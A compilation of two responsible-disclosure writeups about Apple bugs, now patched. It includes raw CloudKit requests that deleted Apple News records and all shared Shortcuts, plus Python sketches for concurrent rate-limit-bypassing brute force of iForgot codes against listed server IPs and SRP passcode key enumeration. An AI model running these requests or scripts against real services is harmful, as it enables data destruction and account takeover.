{ "records" : [ { "recordName" :"A-OQYAcObS_W_21xWarFxFQ", "recordType" :"Article", "fields" : { "iAdKeywords" : { "value" : ["TGiSf6ByLEeqXjy5yjOiBJQ","TGiSr-hyLEeqXjy5yjOiBJQ","TdNFQ6jKmRsSURg96xf4Xiw" ], "type" :"STRING_LIST" }, "topicFlags_143455" : { "value" : [12,0 ], "type" :"INT64_LIST" ...

I also verified that stock data was present:

{ "records": { "recordName":"S-AAPL" }, "zoneID": { "zoneName":"_defaultZone" } }

This gave me:

{ "records" : [ { "recordName" :"S-AAPL", "recordType" :"Stock", "fields" : { "stockEntityID" : { "value" :"EKaaFEbKHS32-pJMZGHyfNw", "type" :"STRING" }, "symbol" : { "value" :"AAPL", "type" :"STRING" }, "feedConfiguration_143441" : { "value" :"{\"feedID\":\"EKaaFEbKHS32-pJMZGHyfNw$en-US\"}", "type" :"STRING" },

Success! I now knew that I could talk with the com.apple.news.public container using the authenticated API on p55-ckdatabasews.icloud.com. I had a different Apple ID set up as a News Publisher, so I could create article drafts and a published channel in the Apple News app. I created a channel and an article and started testing calls against them. Since the Apple ID I used for making requests to the API had no connection to the publisher account, I knew that if I could make modifications to that content, I could modify any article or stock data. The Channel ID I had was TtVkjIR3aTPKrWAykey3ANA. Making a lookup query:

POST /database/1/com.apple.news.public/production/public/records/lookup?clientBuildNumber=2102Hotfix38&clientMasteringNumber=2102Hotfix38 HTTP/1.1 Host: p55-ckdatabasews.icloud.com Cookie: X-APPLE-WEB-ID=...

showed me my test channel:

{ "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "recordType" :"Tag", "fields" : { "relatedTopicTagIDsForOnboarding_143455" : { "value" : [ ], "type" :"STRING_LIST" }, "defaultSectionTagID" : { "value" :"T18PTnZkqQ0qgW33zGzxs8w", "type" :"STRING" }, ... "name" : { "value" :"moa oma", "type" :"STRING" },

With my iPad, I also verified that by going to https://apple.news/TtVkjIR3aTPKrWAykey3ANA I could see my channel in the Apple News app. I then tried all the methods that were possible against records using records/modify, based on the CloudKit documentation: create, update, forceUpdate, replace, forceReplace, delete and forceDelete. On all methods, the response looked like this:

{ "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "reason" :"Operation not permitted", "serverErrorCode" :"ACCESS_DENIED" } ] }

But, on forceDelete:

POST /database/1/com.apple.news.public/production/public/records/modify?clientBuildNumber=2102Hotfix38&clientMasteringNumber=2102Hotfix38 HTTP/1.1 Host: p55-ckdatabasews.icloud.com Cookie: ... 
{ "numbersAsStrings":true, "operations": [ { "record": { "recordType":"Article", "recordChangeTag": "ok", "recordName":"TtVkjIR3aTPKrWAykey3ANA" }, "operationType":"forceDelete" } ], "zoneID": { "zoneName":"_defaultZone" } } The response said: { "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "deleted" :true } ] } I reloaded the channel in Apple News: This confirmed to me that I could delete any channel or article, including stock entries, in the container com.apple.news.public being used for the Stock and Apple News iOS-apps. This worked due to the fact that I could make authenticated calls to CloudKit from the API being used for the Notes-app on www.icloud.com and due to a misconfiguration of the records added in the com.apple.news.public-container. I made a proof of concept to Apple and sent it as a different report on the 17th of March. Apple’s response Apple replied with a fix in place on the 19th of March by modifying the permissions of the records added to com.apple.news.public, where even the forceDelete-call would respond with: { "records" : [ { "recordName" :"TtVkjIR3aTPKrWAykey3ANA", "reason" :"delete operation not allowed", "serverErrorCode" :"ACCESS_DENIED" } ] } I also notified Apple about more of their own containers still having the ability to delete content from, however, it wasn’t clear if those containers were actually using the Public scope at all. Shortcuts Another app that was using the Public scope of CloudKit was Shortcuts. With Apple Shortcuts you can create logical flows that can be launched automatically or manually which then triggers different actions across your apps on iOS-devices. These shortcuts can be shared with other people using iCloud-links which creates an ecosystem around them. There are websites dedicated to recommending and sharing these Shortcuts through iCloud-links. As mentioned above, there is a Shared scope in a CloudKit container. When you decide to share anything private, this scope is often used. You would get something called a Short GUID, that looks something like 0H1FzBMaF1yAC7qe8B2OIOCxx and it would be possible to access using https://www.icloud.com/share/[shortGUID]. However, Apple Shortcuts links works a bit differently. When you share a shortcut, a record with the record type SharedShortcut will be created in the Public scope. The Record name being used will then be formed as a GUID: EA15DF64-62FD-4733-A115-452A6D1D6AAF, the record name will then be formatted to a lowercase string without hyphens and end up as: https://www.icloud.com/shortcuts/ea15df6462fd4733a115452a6d1d6aaf which will be the URL you would share publicly. Accessing this URL would then make a call to: https://www.icloud.com/shortcuts/api/records/ea15df6462fd4733a115452a6d1d6aaf which would return the data from CloudKit: { "recordType":"SharedShortcut", "created": { "userRecordName":"_264f90fe4d6310292cb22dad934baed0", "deviceID":"9AB...", "timestamp":1540330094701 }, "recordChangeTag":"jnm8rnmw", "pluginFields": {}, "deleted":false, "recordName":"EA15DF64-62FD-4733-A115-452A6D1D6AAF", "modified": { "userRecordName":"_264f90fe4d6310292cb22dad934baed0", "deviceID":"9AB...", "timestamp":1540330094701 }, "fields": { "icon_glyph": { "type":"NUMBER_INT64", "value":59412 }, "icon": { "type":"ASSETID", "value": { "downloadURL":"..." This made me excited since I could already see a few attack scenarios. If I could modify other users’ shortcuts, that would be really bad. 
The same kind of issue as with Apple News, being able to delete someone else's shortcut, would also not be great. The Public scope also contained the Shortcuts Gallery showing up in the app itself:

So if that content could be modified, that would be quite critical. The Shortcuts app itself used the protobuf API at gateway.icloud.com:

POST /ckdatabase/api/client/record/save HTTP/1.1
Host: gateway.icloud.com
X-CloudKit-ContainerId: com.apple.shortcuts
X-CloudKit-BundleId: com.apple.shortcuts
X-CloudKit-DatabaseScope: Public
Content-Type: application/x-protobuf; desc="https://p33-ckdatabase.icloud.com:443/static/protobuf/CloudDB/CloudDBClient.desc"; messageType=RequestOperation; delimited=true
User-Agent: CloudKit/962 (18B92)
X-CloudKit-AuthToken: [MY-TOKEN]

Since I had spent so much time modifying InflatableDonkey to try all methods, I could now also use the X-CloudKit-AuthToken from my interception to try to make authorized calls that modify records in the Public scope. However, all the methods that actually did modifications gave me permission errors:

"CREATE operation not permitted* ck1w5bmtg"

This made me realize that, through the API at gateway.icloud.com, my X-CloudKit-AuthToken did not allow me to modify any records in the Public scope. I spent almost 5-6 hours trying to identify any methods that did not give permission errors, but without any luck.

Since I had already reported the Apple News bugs, and Apple had already fixed those issues, I tried the same API connection method I had initially taken from Notes on www.icloud.com:

POST /database/1/com.apple.shortcuts/production/public/records HTTP/1.1
Host: p55-ckdatabasews.icloud.com

That also failed; the container com.apple.shortcuts was not accessible with the authentication used from www.icloud.com.

But remember that I mentioned different APIs talked with CloudKit differently? I went to icloud.developer.apple.com, connected to my own container, took one of the requests and modified the container to com.apple.shortcuts:

POST /r/v4/user/com.apple.shortcuts/Production/public/records/modify?team_id=9DCADDBE3F
Host: p25-ckdatabasews.icloud.apple.com

This worked! I could verify it by using records/lookup with one of the UUIDs from the protobuf content, belonging to one of the gallery banners in the iOS app:

POST /r/v4/user/com.apple.shortcuts/Production/public/records/lookup?team_id=9DCADDBE3F HTTP/1.1
Host: p25-ckdatabasews.icloud.apple.com
Cookie: [MY COOKIES]

{
  "records": [ { "recordName": "C377CA6A-07D3-4A8A-A85E-3ED27EE9592E" } ],
  "numbersAsStrings": true,
  "zoneID": { "zoneName": "_defaultZone" }
}

This gave me:

{
  "records" : [ {
    "recordName" : "C377CA6A-07D3-4A8A-A85E-3ED27EE9592E",
    "recordType" : "GalleryBanner",
    "fields" : {
      "iphone3xImage" : {
        "value" : {
          ...

Perfect! This was now my way of talking with the Shortcuts database: the CloudKit Developer portal connection allowed me to properly authenticate to the com.apple.shortcuts container. I could now start checking the permissions of the public records. The simplest way to do this was to add a Burp replace rule that replaced my own container, iCloud.com.mycontainer.test, with the Shortcuts container com.apple.shortcuts in any request data.

When writing stories of how bugs were found, it's extremely hard to communicate how much time things take and how many attempts were needed to figure things out. And often, the explanation of what actually worked seems really obvious when presented afterwards.
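To make the container-swap testing concrete, here is a rough Python equivalent of that Burp replace rule. This is a sketch under my own assumptions: the endpoint shape is copied from the captured requests above, and COOKIES is a placeholder for a valid, authenticated icloud.developer.apple.com session.

# Sketch: records/lookup against an arbitrary container, mirroring the requests above.
import requests

BASE = "https://p25-ckdatabasews.icloud.apple.com"
TEAM_ID = "9DCADDBE3F"   # team_id value from the captured request above
COOKIES = {}             # placeholder: authenticated developer-portal cookies

def lookup(container: str, record_name: str, zone: str = "_defaultZone") -> dict:
    """Look up a record in a container's Public scope via the portal API."""
    url = f"{BASE}/r/v4/user/{container}/Production/public/records/lookup?team_id={TEAM_ID}"
    body = {
        "records": [{"recordName": record_name}],
        "numbersAsStrings": True,
        "zoneID": {"zoneName": zone},
    }
    return requests.post(url, json=body, cookies=COOKIES).json()

# e.g. swap your own test container for the Shortcuts one:
# lookup("com.apple.shortcuts", "C377CA6A-07D3-4A8A-A85E-3ED27EE9592E")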
I started going through the endpoints from the CloudKit documentation, as well as clicking around in the UX of the CloudKit Developer portal. Records in the public scope were not possible to modify or delete. Some of the record types I found in the public scope were indexable, which allowed you to query for them as lists; however, this was all public info anyway. For example, you could use records/query to get all gallery banners:

{
  "query": {
    "recordType": "GalleryBanner",
    "sortBy": []
  },
  "zoneID": { "zoneName": "_defaultZone" }
}

But that was not an issue, since they were already listed in the app. I looked into subscriptions, which did not really work as expected in the public scope. I looked at the sharing options, but since Shortcuts did not use Short GUID sharing, that was not really interesting either.

(Z)one more thing…

Zones were the last thing I tested. As I mentioned earlier, each scope has zones, and the default zone is called _defaultZone. What is interesting about the Public scope is that the UX of the CloudKit Developer portal actually tells you it doesn't support adding new zones to the Public scope:

However, if I made the call to com.apple.shortcuts to list all zones, I could see that they did indeed have more zones in the Public scope than just the default one. I could also add new zones:

POST /r/v4/user/com.apple.shortcuts/Production/public/zones/modify?team_id=9DCADDBE3F HTTP/1.1
Host: p25-ckdatabasews.icloud.apple.com

{
  "operations": [ {
    "purge": true,
    "zone": {
      "atomic": true,
      "zoneID": { "zoneName": "test" }
    },
    "operationType": "create"
  } ]
}

which responded with:

{
  "zones": [ {
    "syncToken": "AQAAAAAAAAABf/////////+AfEbbUd5SC7kEWsQavq+k",
    "atomic": true,
    "zoneID": {
      "zoneType": "REGULAR_CUSTOM_ZONE",
      "zoneName": "test",
      "ownerRecordName": "_e059f5dc..."
    }
  } ]
}

but I could not see anything bad about it. I could delete my own zones, but that was about it; those zones would never be used or interacted with by anyone else. The documentation for zones was limited: there were no other calls than create or delete. I could create a zone, but was there really any impact to this? I wasn't sure.

I signed in to the CloudKit Developer portal with my second Apple ID and tried to make the same calls to my first user's container:

{
  "zones" : [ {
    "zoneID" : {
      "zoneName" : "_defaultZone",
      "zoneType" : "DEFAULT_ZONE"
    },
    "reason" : "Cannot delete all records from public default zone",
    "serverErrorCode" : "BAD_REQUEST"
  } ]
}

So deletion failed when I tried it as a different user against my own container, as expected: it wasn't possible to delete any container's default zone. Could I make a delete call without actually deleting anything, but confirming the behavior some other way? I did not see a way to do that. My assumption was that a deletion attempt would always result in the error above. I decided to try deleting the metadata_zone:

{
  "operations": [ {
    "purge": true,
    "zone": {
      "atomic": true,
      "zoneID": {
        "zoneType": "REGULAR_CUSTOM_ZONE",
        "zoneName": "metadata_zone"
      }
    },
    "operationType": "delete"
  } ]
}

It replied with an error:

{
  "zones" : [ {
    "zoneID" : {
      "zoneName" : "metadata_zone",
      "ownerRecordName" : "_2e80...",
      "zoneType" : "REGULAR_CUSTOM_ZONE"
    },
    "reason" : "User updates to system zones are not allowed",
    "serverErrorCode" : "NOT_SUPPORTED_BY_ZONE"
  } ]
}

This made me fairly sure that the creation of zones wasn't really an issue. The delete call did not work on existing zones, and there was no impact in being able to create new ones.
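The zone calls above are easy to wrap in the same style as the earlier lookup helper. Here is a sketch (same placeholder session and endpoint assumptions as before) of the non-destructive probe that becomes important later in the story: attempting to create, and then clean up, a zone of your own in a target container's Public scope.

# Sketch: zones/modify with operationType "create" or "delete", as shown above.
import requests

BASE = "https://p25-ckdatabasews.icloud.apple.com"
TEAM_ID = "9DCADDBE3F"   # from the captured request above
COOKIES = {}             # placeholder: authenticated developer-portal cookies

def modify_zone(container: str, zone_name: str, operation: str) -> dict:
    url = f"{BASE}/r/v4/user/{container}/Production/public/zones/modify?team_id={TEAM_ID}"
    body = {
        "operations": [{
            "purge": True,
            "zone": {"atomic": True, "zoneID": {"zoneName": zone_name}},
            "operationType": operation,
        }]
    }
    return requests.post(url, json=body, cookies=COOKIES).json()

# A successful "create" on a container you don't own indicates broken zone
# permissions; deleting your own probe zone afterwards leaves no trace.
# modify_zone("com.apple.shortcuts", "probe-zone", "create")
# modify_zone("com.apple.shortcuts", "probe-zone", "delete")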
I also tried the delete call on _defaultZone, since I was sure the error I would get would be the one above: Cannot delete all records from public default zone. At 23 Mar 2021 20:35:46 GMT I made the following call:

POST /r/v4/user/com.apple.shortcuts/Production/public/zones/modify?team_id=9DCADDBE3F HTTP/1.1
Host: p25-ckdatabasews.icloud.apple.com

{
  "operations": [ {
    "purge": true,
    "zone": {
      "atomic": true,
      "zoneID": { "zoneName": "_defaultZone" }
    },
    "operationType": "delete"
  } ]
}

It responded with:

{
  "zones" : [ {
    "zoneID" : {
      "zoneName" : "_defaultZone",
      "zoneType" : "DEFAULT_ZONE"
    },
    "deleted" : true
  } ]
}

Shit. I did a zones/list again:

{
  "zones" : [ {
    "zoneID" : {
      "zoneName" : "_defaultZone",
      "ownerRecordName" : "_2e805...",
      "zoneType" : "DEFAULT_ZONE"
    },
    "atomic" : true
  }, {
    "zoneID" : {
      "zoneName" : "metadata_zone",
      "ownerRecordName" : "_2e805...",
      "zoneType" : "REGULAR_CUSTOM_ZONE"
    },
    "atomic" : true
  } ]
}

Good, it wasn't really deleted. I felt I had tested it all, and moved on to looking into other things related to Apple Shortcuts. Suddenly, one of my shared shortcuts gave a 404:

But I had just shared it? I quit the Shortcuts app and started it again:

Shit. I went to one of the websites sharing a bunch of shortcuts and used my phone to test one: all of them were gone. I now realized that the deletion did somehow work, but that the _defaultZone itself never disappeared. When I tried sharing a new shortcut, it also did not work, at least not to begin with, most likely because the record types had been deleted as well.

At 23 Mar 2021 20:44:00 GMT I wrote the following email to Apple Security:

I explained the situation and confirmed that I understood the severity. I also explained the steps I had taken to avoid causing any service interruptions, since I knew that was against the Apple Security Bounty policy. I explained that creation of zones was indeed possible, but that I did not know whether that confirmed I could also delete zones. Another reason this bug was hard to find was that the container made by my other Apple developer account wasn't vulnerable. Also, the error when trying to delete metadata_zone had confirmed that there were indeed permission checks in place. The bug seemed to allow only the _defaultZone of Apple-owned CloudKit containers to be deleted by anyone.

I decided to use the case of "I am able to create a zone" as an indicator that this bug existed in other containers owned by Apple. This would show Apple the scope of the issue without me causing any more harm. I was already panicking. Apart from com.apple.shortcuts, the list consisted of 30 more containers with the same issue. I still wasn't sure whether creating a new zone in the public scope actually proved the ability to delete the default zone, but that was the closest I got to verifying the issue. Also, the other containers might not have been using the public scope at all, and I never confirmed the bug on the other scopes.

Apple's first response came early the morning after:

Public response

I acknowledged the email and started to see on Twitter that this was in fact affecting a lot of people:

There were also suspicions that this was a deliberate move by Apple, due to a podcast discussion about using the API to fetch Shortcuts data. A podcast called "Connected" discussed the issue and tried to explain what had happened (between 26:50 and 40:22).
One individual was actually 100% correct in identifying the minute of my accidental deletion call:

Apple's response

Apple was quite silent after their first request that I stop testing. They did go public and explained that the issue was going to be solved:

It took a few days for all data to recover. One other individual shared my assumption about why that was:

On April 1st Apple gave the following reply:

During the holdout period, I followed up on their email again, clarifying the steps I had taken to prevent any service interruption, and tried to explain how limited my options were to confirm whether the deletion call had worked or not. I also asked them whether the creation of a zone was a good indicator of the bug. I got back another response clarifying that creation of a zone was indeed a valid, non-destructive way to confirm invalid security controls:

I then confirmed that I could no longer perform any of the zone modifications. The CloudKit Developer portal was later moved to use the API on api.apple-cloudkit.com instead.

Conclusion

Approaching CloudKit for bugs turned out to be a lot of fun, a bit scary, and a really good example of what a real deep dive into one technology can result in when hunting bugs. The Apple Security team was incredibly helpful and professional throughout the process of reporting these issues. Even though the last bug caused an incident, I really tried to explain all the steps I took to prevent that from happening. The Apple Security Bounty program decided to award $12,000, $24,000 and $28,000, respectively, for the bugs mentioned in this post.

Source: https://labs.detectify.com/2021/09/13/hacking-cloudkit-how-i-accidentally-deleted-your-apple-shortcuts/
23. This article is about how I found a vulnerability in Apple's forgot-password endpoint that allowed me to take over an iCloud account. The vulnerability has been completely patched by the Apple security team and no longer works. Apple rewarded me $18,000 USD as part of their bounty program, but I refused to receive it. Please read the article to know why I refused the bounty.

After my Instagram account takeover vulnerability, I realized that many other services are vulnerable to race-hazard-based brute forcing. So I kept reporting the same issue to the affected service providers, like Microsoft, Apple and a few others. Many people mistook this vulnerability for a typical brute-force attack, but it isn't: here we send multiple concurrent requests to the server to exploit a race condition in the rate limits, making it possible to bypass them. Now let's see what I found in Apple.

The forgot-password option for an Apple ID allows us to change our password using a 6-digit OTP sent to our mobile number and email address respectively. Once we enter the correct OTP, we are able to change the password.

Apple forgot password page prompting to enter mobile number after entering email address

For security reasons, Apple prompts us to enter the trusted phone number along with the email address to request the OTP. So to exploit this vulnerability, we need to know the target's trusted phone number as well as their email address to request the OTP, and we would have to try all possibilities of the 6-digit code, which is around 1 million attempts (10^6).

As far as my testing went, the forgot-password endpoint had pretty strong rate limits. If we make more than 5 attempts, the account gets locked for the next few hours; even rotating the IP didn't help.

HTTP POST REQUEST SENT TO FORGOT PASSWORD ENDPOINT AND ITS RESPONSE

Then I tried race-hazard-based brute forcing by sending simultaneous POST requests to the Apple server and found a few more limitations. To my surprise, Apple has rate limits for concurrent POST requests from a single IP address, not just on the forgot-password endpoint but across the entire Apple server. We cannot send more than 6 concurrent POST requests; they get dropped. And they are not just dropped: our IP address gets blacklisted for future POST requests with a 503 error. Oh my god! That is too much 🤯 So I thought they weren't vulnerable to this type of attack 😔 but I still had some hope, since these were generic rate limits across the server and not specific to the code validation endpoint. After some testing, I found a few things:

- iforgot.apple.com resolves to 6 IP addresses across the globe: 17.141.5.112, 17.32.194.36, 17.151.240.33, 17.151.240.1, 17.32.194.5 and 17.111.105.243.
- There are two rate limits, as we have seen above: one is triggered when we send more than 5 requests to the forgot-password endpoint (http://iforgot.apple.com/password/verify/smscode), and the other applies across the Apple server when we send more than 6 concurrent POST requests.
- Both of these rate limits are specific to an Apple server IP, which means we can still send requests (within limits, though) to another Apple server IP.
- We can send up to 6 concurrent requests to one Apple server IP (by binding iforgot.apple.com to that IP) from a single client IP address, as per their limits. There are 6 Apple IP addresses resolved, as mentioned above. So we can send up to 36 requests across the 6 Apple IP addresses (6 x 6 = 36) from a single IP address (see the sketch below).
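To illustrate the 6 x 6 arithmetic, here is a sketch of how such a fan-out could be structured: each batch of up to 6 concurrent POSTs is pinned to one of the resolved server IPs by connecting to the IP directly and supplying the hostname in the Host header. The request body is a placeholder (the real payload format is not reproduced here) and the bug has long been patched; this only demonstrates the distribution idea, not a working exploit.

# Sketch only: distributing concurrent POSTs across the resolved server IPs.
import concurrent.futures
import requests

SERVER_IPS = ["17.141.5.112", "17.32.194.36", "17.151.240.33",
              "17.151.240.1", "17.32.194.5", "17.111.105.243"]
PER_IP = 6   # per-IP concurrency cap described above

def attempt(ip: str, code: str):
    # Connect to the IP directly, naming the real host in the Host header.
    # verify=False because certificate hostname checks fail when dialing a raw IP.
    url = f"https://{ip}/password/verify/smscode"
    payload = {"code": code}   # placeholder body, not the real request format
    return requests.post(url, json=payload,
                         headers={"Host": "iforgot.apple.com"},
                         verify=False, timeout=10)

codes = [f"{n:06d}" for n in range(len(SERVER_IPS) * PER_IP)]  # one 36-guess batch
with concurrent.futures.ThreadPoolExecutor(max_workers=len(codes)) as pool:
    results = [pool.submit(attempt, SERVER_IPS[i % len(SERVER_IPS)], c)
               for i, c in enumerate(codes)]

At 36 guesses per source IP, covering the full 10^6 code space is what drives the roughly 28K-address estimate in the next paragraph.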
Therefore, the attacker would require around 28K IP addresses to send up to 1 million requests (1,000,000 / 36 ≈ 28,000) to successfully verify the 6-digit code.

28K IP addresses looks easy if you use cloud service providers, but here comes the hardest part: the Apple server behaves strangely when we try to send POST requests from cloud service providers like AWS, Google Cloud, etc.

Response for any POST request sent from AWS & Google cloud

They reject the POST request with a 502 Bad Gateway without even checking the request URI or body. I tried changing IPs, but all of them returned the same response code, which means they have blacklisted the entire ASN of some cloud service providers, if I'm not wrong 🙄 It makes the attack harder for those who rely on reputable cloud services like AWS. I kept trying various providers and finally found a few whose network IPs were not blacklisted. Then I tried to send multiple concurrent POST requests from different IP addresses to verify the bypass.

And it worked!!! 🎉🎉🎉 Now I could change the password of any Apple ID with just their trusted phone number 😇

Of course the attack isn't easy to pull off; we need a proper setup to successfully exploit this vulnerability. First we need to bypass the SMS 6-digit code, then the 6-digit code received at the email address. Both bypasses are based on the same method and environment, so we need not change anything while trying the second bypass. Even if the user has two-factor authentication enabled, we would still be able to access their account, because the 2FA endpoint shares the same rate limit and was also vulnerable. The same vulnerability was also present in the password validation endpoint.

I reported this information, with detailed reproduction steps and a video demonstrating the bypass, to the Apple security team on July 1st, 2020. Apple acknowledged and triaged the issue within a few minutes of the report. I didn't get any updates from Apple after triage, so I kept following up for status updates, and on Sep 9th, 2020 they said they were working on a fix. Again, no updates for the next 5 months, and then this email came when I asked for status:

They said they were planning to address the issue in an upcoming security update. I was wondering what was taking them so long to react to a critical vulnerability. Instead of relying on them, I kept retesting the vulnerability to see whether it was fixed. I tested on April 1st, 2021 and realized that a patch for the vulnerability had been released to production, but there were still no updates from Apple. I asked them whether the issue was patched, and the response was the same: they had no status updates to share. I was patient and waited for them to update the status.

After a month, I wrote to them that the issue had been patched on April 1st and asked why I was not being updated about it; I also told them that I wanted to publish the report on my blog. The Apple security team asked whether it was possible to share a draft of the article with them before publishing. That is when things started to go unexpectedly. After sharing the draft, they denied my claim, saying that this vulnerability did not allow taking over the majority of iCloud accounts. Here's their response:

As you can see in the email screenshot, their analysis revealed that it only works against iCloud accounts that have not been used on passcode- or password-protected Apple devices.
I argued that even if the device passcode (4-digit or 6-digit) is asked for instead of the 6-digit code sent to email, it would still share the same rate limits and would be vulnerable to race-condition-based brute-forcing attacks. We would also be able to discover the passcode of the associated Apple device.

I also noticed a few changes to their support page regarding forgot password. Link: https://support.apple.com/en-in/HT201487

The above screenshot shows how the page looks now, but it wasn't the same before my report. In October 2020, that page looked like this. Link from web archive: http://web.archive.org/web/20201005172245/https://support.apple.com/en-in/HT201487

"In some cases" was prefixed to the paragraph in October 2020, which is exactly after I was told in September 2020 that they were working on a fix. It looks like everything was planned: the page was updated to support their claim that only a limited set of users were vulnerable. That page hadn't been updated for years, yet it got a minor update right after my report. It doesn't look like a coincidence. When I asked about it, they said the updates were made due to changes in iOS 14. What does resetting a password using a trusted email / phone number have to do with iOS 14, I asked. If that is true, were the trusted phone number and email used to reset the password before iOS 14? If so, my report would be applicable to all Apple accounts. I didn't get any answer from them.

I was disappointed and told them that I was going to publish the blog post with all the details, without waiting for their approval. Here's the reply I got from them:

They arranged a call with Apple team engineers to explain what they found in their analysis and to answer any questions I might have. During the call, I asked why it was different from the vulnerability I had found. They said that the passcode is not sent to any server endpoint and is verified on the device itself. I argued that there is no way for a random Apple device to know another device's passcode without contacting the Apple server. They said it is true that the data is sent to the server, but that it is verified using a cryptographic operation, and that they could not reveal more due to security concerns. I asked: what if we figure out the encryption process through reverse engineering, replicate it, and brute force the Apple server with concurrent requests? I didn't get any definite answer to that question. They concluded that the only way to brute force the passcode is by brute forcing the Apple device itself, which is not possible due to the local system rate limits.

I couldn't accept what the Apple engineers said; logically, it should be possible to replicate whatever an Apple device does when sending the passcode data to the server. I decided to verify it myself to prove them wrong. If what they said was true, the passcode validation endpoint should be vulnerable to race-condition-based brute forcing.

After a few hours of testing, I found that they have SSL pinning specific to the passcode validation endpoint, so the traffic sent to the server cannot be read by a MITM proxy like Burp / Charles. Thanks to checkra1n and SSL Kill Switch, I was able to bypass the pinning and read the traffic sent to the server. I figured out that Apple uses SRP (Secure Remote Password), a PAKE protocol, to verify that the user knows the right passcode without actually sending it to the server. So what the engineers said was right: they aren't sending the passcode directly to the server.
Instead, both server and client do some mathematical calculations using previously known data to arrive at a key (much like a Diffie-Hellman key exchange). Without getting into the specifics of SRP, let me get straight to what is necessary in our context.

The Apple server has two stored values, namely a verifier and a salt, specific to each user, created at the time of setting or updating the passcode. Whenever a user initiates an SRP authentication with a username and an ephemeral value A, the Apple server responds with the salt of that specific user and an ephemeral value B. The client uses the salt obtained from the server to calculate the key prescribed by SRP-6a. The server uses the salt and the verifier to calculate the key prescribed by SRP-6a. Finally, they both prove to each other that the derived keys are the same. Read more about the detailed calculations of SRP-6a here.

SRP is known to prevent brute-force attacks, as it uses a user-specific salt and a verifier, so even if someone steals the database, they still need to perform a CPU-intensive brute force for each user to discover the passwords one by one. That gives the affected vendor enough time to react. But in our case, we don't have to brute force a large number of accounts: brute forcing a single user is enough to get into their iCloud account as well as to find their passcode.

Brute forcing is possible only when you have both the salt and the verifier specific to the target user. After bypassing the SMS code, we can easily impersonate the target user and obtain the salt. But the problem here is the verifier. We would either have to somehow obtain the verifier from the server, or bypass the rate limit on the key-verifying endpoint. If the rate limit is bypassed, we can keep trying different candidate keys, derived from precomputed values of the passcode, until we arrive at the matching key. Obviously, it requires a lot of computation to derive a key for each 4- or 6-digit numeric passcode (from 0000/000000 to 9999/999999).

When we enter the passcode on an iPhone / iPad during password reset, the device initiates SRP authentication by sending the user session token obtained from the successful SMS verification. The server responds with the salt of the respective user. The passcode and the salt are hashed to derive the final key, which is sent to https://p50-escrowproxy.icloud.com/escrowproxy/api/recover to check whether it matches the key computed (using the ephemeral values, salt and verifier) on the server. The POST request sent to verify the key looked like this:

The string tag has all the data mentioned above, but sent in DATA BLOB format. The first thing I wanted to check was the rate limit, before decoding the values of the BLOB. I sent the request 30 times concurrently to check whether the endpoint was vulnerable. To my shock, it wasn't: out of 30 requests, 29 were rejected with an internal server error.

Rate limiting could be performed on the Apple server itself or in an HSM (hardware security module). Either way, the rate-limit logic has to be programmed specifically to prevent race hazards. There is only a very slim chance that this endpoint was not vulnerable to the race hazard before my report, because all the other endpoints I tested were vulnerable: SMS code validation, email code validation, two-factor authentication and password validation. If they did patch it after my report, the vulnerability became a lot more severe than what I initially thought.
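To make the SRP-6a flow above concrete, here is a compact sketch of the client-side computation and why a small passcode space matters. The group parameters, hash choice and x-derivation are illustrative assumptions (the writeup does not disclose Apple's exact parameters); the point is that, given a captured salt and server ephemeral B, each candidate passcode yields exactly one candidate key.

# Sketch of the client side of SRP-6a as described above.
import hashlib

# 1024-bit group from RFC 5054, Appendix A (g = 2); illustrative choice only.
N = int(
    "EEAF0AB9ADB38DD69C33F80AFA8FC5E86072618775FF3C0B9EA2314C9C256576"
    "D674DF7496EA81D3383B4813D692C6E0E0D5D8E250B98BE48E495C1D6089DAD1"
    "5DC7D7B46154D6B6CE8EF4AD69B15D4982559B297BCF1885C529F566660E57EC"
    "68EDBC3C05726CC02FD4CBF4976EAA9AFD5138FE8376435B9FC61D2FC0EB06E3", 16)
g = 2

def to_bytes(x: int) -> bytes:
    return x.to_bytes((x.bit_length() + 7) // 8 or 1, "big")

def H(*parts: bytes) -> int:
    return int.from_bytes(hashlib.sha256(b"".join(parts)).digest(), "big")

def client_key(passcode: str, salt: bytes, a: int, B: int) -> bytes:
    """Derive the shared SRP-6a key on the client side."""
    A = pow(g, a, N)
    k = H(to_bytes(N), to_bytes(g))                           # multiplier parameter
    u = H(to_bytes(A), to_bytes(B))                           # scrambling parameter
    x = H(salt, hashlib.sha256(passcode.encode()).digest())   # assumed x = H(s | H(pw))
    # S = (B - k * g^x) ^ (a + u * x) mod N
    S = pow((B - k * pow(g, x, N)) % N, a + u * x, N)
    return hashlib.sha256(to_bytes(S)).digest()

# A 4-digit passcode space is only 10,000 candidates: with a captured salt,
# each candidate maps to one key, so an unthrottled verify endpoint (or a
# leaked verifier) would make exhausting the space trivial.
# candidates = (f"{n:04d}" for n in range(10_000))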
Through brute forcing the passcode, we would be able to identify the correct passcode by differentiating the responses. So we could not only take over any iCloud account, but also discover the passcode of the Apple device associated with it. Even though the attack is complex, this vulnerability could hack any iPhone / iPad that has a 4-digit / 6-digit numeric passcode, if my assumption is right. Since the endpoint now validates concurrent requests properly, there is no way for me to verify my claim; the only way I could confirm it is by writing to Apple, but they aren't giving any response in this regard.

I got the bounty email from Apple on June 4th, 2021. The actual bounty listed for iCloud account takeover on Apple's website is $100,000 USD. Extracting sensitive data from a locked Apple device is $250,000 USD. My report covered both scenarios (assuming the passcode endpoint was patched after my report), so the actual bounty should have been $350,000 USD. Even if they chose to award only the higher-impact case of the two, it should still be $250,000 USD. Selling these kinds of vulnerabilities to government agencies or private bounty programs like Zerodium could have made a lot more money. But I chose the ethical way, and I didn't expect anything more than the bounty amounts outlined by Apple. https://developer.apple.com/security-bounty/payouts/

But $18,000 USD is not even close to the actual bounty. Let's say all my assumptions are wrong and the Apple passcode-verifying endpoint wasn't vulnerable before my report. Even then, the given bounty is not fair, looking at the impact of the vulnerability as given below.

- Bypassed two-factor authentication. It is literally as if 2FA doesn't exist due to the bypass. Everyone relying on 2FA was vulnerable. This by itself is a major vulnerability.
- Bypassed the password validation rate limits. All Apple ID accounts that use common / weak / leaked passwords were vulnerable, even with two-factor authentication enabled. Once hacked, the attacker can track the location of the device as well as wipe it remotely. The 2014 celebrity iCloud hack was largely due to weak passwords.
- Bypassed the SMS verification, if we know the passcode or password of the device associated with the iCloud account. Say any of your friends or relatives knows your device passcode: using this vulnerability, they could take over your iCloud account and erase your entire device remotely over the internet, without physical access to it.
